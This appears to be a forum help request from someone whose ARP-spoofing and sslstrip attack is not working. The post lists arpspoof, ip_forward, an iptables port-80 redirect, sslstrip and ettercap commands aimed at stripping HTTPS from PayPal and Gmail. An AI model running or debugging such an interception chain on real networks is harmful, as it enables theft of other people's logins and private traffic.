Here's the setup:
Target: 192.168.1.2
GW: 192.168.1.1 (my subnetmask BTW is 255.255.255.240. will this affect this?)
################################################## ###
nano /etc/etter.conf #I've uncomment the redir_command in iptables for linux ##
##
echo 1 > /proc/sys/net/ipv4/ip_forward #I've setup ip forward ##
##
arpspoof -i eth0 -t 192.168.1.2 192.168.1.1 #my int is eth0 ##
iptables -t nat -A PREROUTING -p tcp --destination-port 80
-j REDIRECT --to-ports 10000 #I've set this up for the packets will redirect to sslstrip
sslstrip -a -k -f # I've run sslstrip with these parameters. ##
##
ettercap -T -q -i eth0 #then lastly I've run ettercap to test it. ##
################################################## ###
that's the whole set of commands that I've used. as I said, I still got certificate error for paypal and
It's a looping scheme for gmail. I'm not redirected to my mail content.
Thanks for the help .
